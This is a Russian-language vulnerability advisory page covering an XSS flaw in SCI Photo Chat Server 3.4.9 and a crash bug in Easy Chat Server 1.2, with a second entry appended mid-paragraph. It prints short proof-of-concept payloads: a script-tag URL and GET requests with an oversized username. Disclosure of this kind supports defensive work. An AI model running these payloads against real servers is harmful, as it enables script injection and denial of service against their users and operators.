Межсайтовый скриптинг в SCI Photo Chat Server

Дата публикации:
04.07.2004
Дата изменения:
17.10.2006
Всего просмотров:
800
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: SCI Photo Chat Server 3.4.9

Описание: Уязвимость в SCI Photo Chat Server позволяет удаленному пользователю выполнить XSS нападение.

Эксплоит:

http://[host]:1235/<script>alert("hy")</script>

Решение: http://www.simmcomm.ch/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Программа: Easy Chat Server 1.2

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость в Easy Chat Server позволяет удаленному пользователю аварийно завершить работу программы.

Эксплоит:

GET /chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0
Host: http://[host]

GET /chat.ghp?username=FakeUser&password=&room=1&sex=0
Host: http://[host]

Решение: http://www.echatserver.com/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время

Ссылки: Multiple Vulnerabilities in Easy Chat Server 1.2

или введите имя

CAPTCHA